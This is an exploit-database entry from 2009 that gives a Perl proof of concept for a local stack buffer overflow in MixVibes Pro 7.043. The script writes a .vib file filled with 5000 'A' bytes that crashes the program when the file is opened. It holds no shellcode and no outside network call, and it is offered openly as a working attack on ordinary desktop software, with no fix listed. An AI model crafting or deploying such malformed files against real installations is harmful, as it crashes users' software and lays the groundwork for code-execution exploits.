MixVibes Pro 7.043 (.vib File) Local Stack Overflow PoC

2009-07-14 20:31:52

#!/usr/bin/perl
# Found By :: HACK4LOVE
#
# http://www.softpedia.com/progDownload/MixVibes-Pro-Download-3074.html
########################################################################################
my $crash="\x41" x 5000;
open(myfile,'>>hack4love.vib');
print myfile $crash;
########################################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.